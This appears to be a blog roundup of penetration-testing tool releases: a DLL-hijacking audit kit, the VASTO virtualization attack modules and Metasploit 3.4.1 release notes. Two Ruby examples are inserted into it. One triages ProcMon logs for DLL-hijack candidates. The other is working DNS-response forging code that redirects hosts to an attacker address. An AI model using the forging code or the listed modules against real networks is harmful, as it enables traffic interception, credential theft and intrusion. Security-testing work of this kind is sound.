Metasploit

The latest buzzword in the information security industry is “insecure DLL loading”, “DLL hijacking” or “DLL preloading”. Mr. HD Moore, the author of Metasploit, has gone ahead and made it very easy for a lot of us to test for such attacks at leisure, hence the spurt in proof-of-concept code online! Mr. Peter Van Eeckhoutte has been maintaining a list of such vulnerable applications on his wonderful blog, hosted here.

This toolkit uses native JScript, automatically kills spawned processes, reduces the memory usage of ProcMon, and automatically validates every result from the CSV log. It is a complete rewrite of version 1 of the tool. The kit turns your desktop PC into a vulnerability mincing machine by launching the file handler for every registered file type while recording whether or not a DLL was accessed within the working directory of the associated file. DLLHijackAuditKit will help you verify whether an application is vulnerable to DLL preloading attacks.

How to use DLLHijackAuditKit v2?
1. Download ProcMon from here and copy the procmon.exe binary into the DLLHijackAuditKit directory. Launch the Process Monitor, accept the EULA, and exit.
2. Download Ruby from here and install it normally.
3. Browse to this directory and launch 01_StartAudit.bat as an Administrator. The Administrator bit is important, as it allows the script to kill background services spawned by the handlers and prevents UAC popups.
4. After the audit script completes (15-30 minutes), switch to the Process Monitor window, and access File->Save from the menu. Save the resulting log in CSV format to the local directory with the name “Logfile.CSV”.
5. Launch 02_Analyze.bat as an Administrator. This will scan through the CSV log, build test cases for each potential vulnerability, try them, and automatically create a proof-of-concept within the Exploits directory should they succeed.
6. Identify the affected vendor for each generated proof-of-concept and ask them nicely to fix their application. Send them the calc.exe-launching PoC if necessary.
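The triage that step 5 performs on the ProcMon log, written out as an added Ruby example (this is not the kit's own 02_Analyze code): every CreateFile that looked for a .dll in the audit directory and came back NAME NOT FOUND or PATH NOT FOUND is a candidate, because a DLL planted there under that name sits earlier in the loader's search path than the one the program eventually found. The CSV rows, the audit directory `C:\Audit\docs` and the function names are constructed for illustration.

```ruby
require 'csv'

# Constructed sample in the column layout of a ProcMon CSV export (not a real capture).
SAMPLE_LOG = <<~'CSV'
  "Time of Day","Process Name","PID","Operation","Path","Result","Detail"
  "10:01:02.1","viewer.exe","1234","CreateFile","C:\Audit\docs\dwmapi.dll","NAME NOT FOUND","Desired Access: Read Attributes"
  "10:01:02.2","viewer.exe","1234","CreateFile","C:\Windows\System32\dwmapi.dll","SUCCESS","Desired Access: Read Data"
  "10:01:03.0","viewer.exe","1234","CreateFile","C:\Audit\docs\plugin.dll","NAME NOT FOUND","Desired Access: Read Attributes"
  "10:01:03.1","viewer.exe","1234","CreateFile","C:\Audit\docs\report.pdf","SUCCESS","Desired Access: Generic Read"
  "10:01:04.0","player.exe","2222","CreateFile","C:\Program Files\Player\codec.dll","NAME NOT FOUND","Desired Access: Read Attributes"
  "10:01:05.0","player.exe","2222","CreateFile","C:\Audit\docs\DWMAPI.DLL","NAME NOT FOUND","Desired Access: Read Attributes"
CSV

# ProcMon results that mean "looked here, nothing found": a planted DLL would be picked up.
MISSING = ['NAME NOT FOUND', 'PATH NOT FOUND'].freeze

# Returns one candidate per (process, dll name) pair whose lookup failed inside audit_dir.
# Lookups that fail elsewhere (e.g. the application's own install directory) are ignored,
# since the attacker controls the document directory, not the program directory.
def dll_hijack_candidates(csv_text, audit_dir)
  dir = audit_dir.downcase.chomp('\\')
  seen = {}
  CSV.parse(csv_text, headers: true).each do |row|
    next unless row['Operation'] == 'CreateFile' && MISSING.include?(row['Result'])
    path = row['Path'].to_s
    parent, _sep, file = path.rpartition('\\')
    next unless file.downcase.end_with?('.dll') && parent.downcase == dir
    key = [row['Process Name'].downcase, file.downcase]   # dedupe repeated probes, case-insensitive
    seen[key] ||= { process: row['Process Name'], pid: row['PID'].to_i, dll: file, plant_at: path }
  end
  seen.values
end

# One line per candidate: which handler probed for which DLL, and where a PoC DLL would go.
def report(candidates)
  candidates.map { |c| "#{c[:process]} (pid #{c[:pid]}) probed #{c[:dll]} -> plant #{c[:plant_at]}" }
end

puts report(dll_hijack_candidates(SAMPLE_LOG, 'C:\Audit\docs')) if __FILE__ == $0
```

A hit here is only a candidate: the kit's analysis step confirms each one by copying a calc.exe-launching DLL to the reported path and relaunching the handler, and only a confirmed load ends up in the Exploits directory. Note that a probe for a DLL the program later finds in System32 (dwmapi.dll above) is still reportable, because the document directory is searched first.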

DLLHijackAuditKit v2: Better, Faster, Stronger DLL Tests!

It is very easy to use, and compared with today’s emerging tools it is small and still does the job! There are some known issues with this tool on Windows XP machines, etc. Hopefully Mr. Moore fixes them soon. Till then you can try being a vulnerability discoverer with this simple tool! Grab your pie while this vuln is hot!

Download DLLHijackAuditKit v2 here


A new and improved version of VASTO is ready for action.

VASTO is a Virtualization Assessment Toolkit, a collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audits of virtualization solutions. It has been sponsored by Secure Network and includes contributions by fellow hackers.

Changes made in VASTO:

- abiquo_guest_stealer.rb
Exploits a path traversal in Abiquo up to version 1.5

It has been tested under Metasploit 3.4.2 and Ubuntu Linux, but should work (maybe with minimal modifications) under Windows or any platform supported by Metasploit.

The current version, 0.3, was released at Black Hat US 2010.

Modules currently implemented:
- abiquo_guest_stealer.rb
Exploits a path traversal in Abiquo up to version 1.5
- abiquo_poison.rb
Serves an evil VM if a MITM is performed.
- eucalyptus_bouncer.rb
Turns Eucalyptus systems into proxy servers.
- eucalyptus_poison.rb
Serves an evil VM if a MITM is performed.
- vmware_guest_stealer.rb
Exploits a path traversal in VMware products.
- vmware_login.rb
Brute forcer for VMware
- vmware_session_rider.rb
Local proxy to ride stolen SOAPID sessions with VI Client
- vmware_sfcbd_exec.rb
Command exec (authenticated) on Studio and Data Protection
- vmware_studio_upload.rb
Arbitrary file upload on Studio 2.0 beta
- vmware_updatemanager_traversal.rb
Jetty path traversal
- vmware_version.rb
Fingerprints VMware products
- vmware_vilurker.rb
MITM code execution against VI Client
- vmware_webaccess_portscan.rb
Turns VMware WebAccess into a portscanner (or a proxy)
- vmware_autopwn
Automates exploiting the updatemanager traversal to ride a session
- xen_login.rb
Brute forcer for XEN server

Video Tutorial of VASTO:

Download VASTO v0.3 here


The Metasploit Framework has been updated to version 3.4.1 in less than 3 months!

Metasploit Framework 3.4.1!

The Metasploit Framework is a penetration testing toolkit, exploit development platform, and research tool. The framework includes hundreds of working remote exploits for a variety of platforms. Payloads, encoders, and nop slide generators can be mixed and matched with exploit modules to solve almost any exploit-related task.

Statistics:

  • Metasploit now has 567 exploits and 283 auxiliary modules (up from 551 and 261 in v3.4)
  • Over 40 community reported bugs were fixed and numerous interfaces were improved

General:

  • The Windows installer now ships with a working Postgres connector
  • New session notifications now always print a timestamp regardless of the TimestampOutput setting
  • Addition of the auxiliary/scanner/discovery/udp_probe module, which works through Meterpreter pivoting
  • HTTP client library is now more reliable when dealing with broken/embedded web servers
  • Improvements to the database import code, covering NeXpose, Nessus, Qualys, and Metasploit Express
  • The msfconsole “connect” command can now speak UDP (specify the -u flag)
  • Nearly all exploit modules now have a DisclosureDate field
  • HTTP fingerprinting routines added to some exploit modules
  • The psexec module can now run native x64 payloads on x64 based Windows systems
  • A development style guide has been added in the HACKING file in the SVN root
  • FTP authentication bruteforce modules added

Payloads:

  • Some Meterpreter scripts (notably persistence and getgui) now create a resource file to undo the changes made to the target system.
  • Meterpreter scripts that create logs and download files now save their data in the ~/.msf3/logs/scripts folder.
  • New Meterpreter scripts:
      • enum_firefox – Enumerates Firefox data like history, bookmarks, form history, typed URLs, cookies and downloads databases.
      • arp_scanner – Script for performing an ARP scan of a given CIDR.
      • enum_vmware – Enumerates VMware products and their configuration.
      • enum_powershell – Enumerates PowerShell version, execution policy, profile and installed modules.
      • enum_putty – Enumerates recent and saved connections.
      • get_filezilla_creds – Enumerates recent and saved connections and extracts saved credentials.
      • enum_logged_on_users – Enumerates past users that logged in to the system and currently connected users.
      • get_env – Extracts all user and system environment variables.
      • get_application_list – Enumerates installed applications and their versions.
      • autoroute – Sets a route from within a Meterpreter session without the need to background the session.
      • panda_2007_pavsrv53 – Panda 2007 privilege escalation exploit.
  • Support for a DNS bypass list added to auxiliary/server/fakedns. It allows the user to specify which domains to resolve externally while returning forged records for everything else. Thanks to Rudy Ruiz for the patch.
  • Railgun – The Meterpreter “RAILGUN” extension by Patrick HVE has been merged and is now available for scripts.
  • PHP Meterpreter – A protocol-compatible port of the original Meterpreter payload to PHP. This new payload adds the ability to pivot through web servers regardless of the native operating system.
  • Token impersonation now works with “execute -t” to spawn new commands with a stolen token.
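The bypass-list behaviour described for auxiliary/server/fakedns, as an added Ruby example that is not the module's own code: a query is parsed off the wire, names on the bypass list (or under them) are marked for forwarding to the real resolver, and everything else gets a forged A record pointing at the attacker's address. The bypass entries, the forged IP 10.0.0.5, the sample queries and all function names are assumptions for illustration; the real module's option names and matching rules are not reproduced here.

```ruby
require 'ipaddr'

# Assumed configuration: names that must still resolve for real, and the address
# handed out for every other A query.
BYPASS_DOMAINS = %w[update.example.com example.org].freeze
FORGED_IP = '10.0.0.5'

def normalize_name(name)
  name.to_s.downcase.chomp('.')
end

# A query is bypassed when it names a bypass entry exactly or a subdomain of one.
# A plain suffix test would wrongly match notexample.org, so the leading dot is required.
def bypassed?(qname, bypass = BYPASS_DOMAINS)
  q = normalize_name(qname)
  bypass.any? do |entry|
    d = normalize_name(entry)
    q == d || q.end_with?(".#{d}")
  end
end

# Build a wire-format query with one question (used here to construct sample traffic).
def build_query(id, name, qtype = 1)
  pkt = [id, 0x0100, 1, 0, 0, 0].pack('n6')          # RD set, QDCOUNT 1
  name.split('.').each { |label| pkt << [label.bytesize].pack('C') << label }
  pkt << "\x00" << [qtype, 1].pack('nn')              # root label, QTYPE, QCLASS IN
  pkt
end

# Parse the header and single question; returns [id, name, qtype, raw question bytes].
def parse_query(pkt)
  id, flags, qdcount = pkt.unpack('nnn')
  raise ArgumentError, 'not a query' unless (flags & 0x8000).zero?
  raise ArgumentError, 'expected exactly one question' unless qdcount == 1
  pos = 12
  labels = []
  loop do
    len = pkt.getbyte(pos)
    raise ArgumentError, 'truncated packet' if len.nil?
    raise ArgumentError, 'compression pointer in question' unless (len & 0xC0).zero?
    pos += 1
    break if len.zero?
    labels << pkt[pos, len]
    pos += len
  end
  qtype = pkt[pos, 4].unpack('nn').first
  [id, labels.join('.'), qtype, pkt[12, pos + 4 - 12]]
end

# Forged reply: same id and question, QR/RD/RA set, NOERROR, one A record.
def forge_response(query, ip = FORGED_IP)
  id, _name, _qtype, question = parse_query(query)
  header = [id, 0x8180, 1, 1, 0, 0].pack('n6')       # ANCOUNT 1
  # Owner name is a pointer to offset 12 (the question name); TTL 60; RDLENGTH 4; address.
  answer = [0xC00C, 1, 1, 60, 4].pack('nnnNn') + IPAddr.new(ip).hton
  header + question + answer
end

# Decision for each incoming query: hand it to the real resolver or answer with the forgery.
def handle_query(query, bypass = BYPASS_DOMAINS)
  _id, qname, qtype, _question = parse_query(query)
  if qtype != 1 || bypassed?(qname, bypass)
    [:forward, qname]          # a real server would relay upstream and return that answer
  else
    [:forge, forge_response(query)]
  end
end
```

Only A queries are forged here; anything else is forwarded so that the target keeps working normally, which is what makes a bypass list useful during an engagement (update checks and login portals keep resolving while the hosts you care about are redirected).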

This release sees the first official non-Windows Meterpreter payload, in PHP as discussed last month. A new extension called Railgun is now integrated into Meterpreter courtesy of Patrick HVE, giving you scriptable access to Windows APIs and an unprecedented amount of control over post-exploitation. For those of you wishing to contribute to the framework, a new file called HACKING has been introduced that lays out a few guidelines for making it easier.

This release has 16 new exploits, 22 new auxiliary modules and 11 new Meterpreter scripts for your pwning enjoyment.

Download Metasploit Framework v3.4.1 here
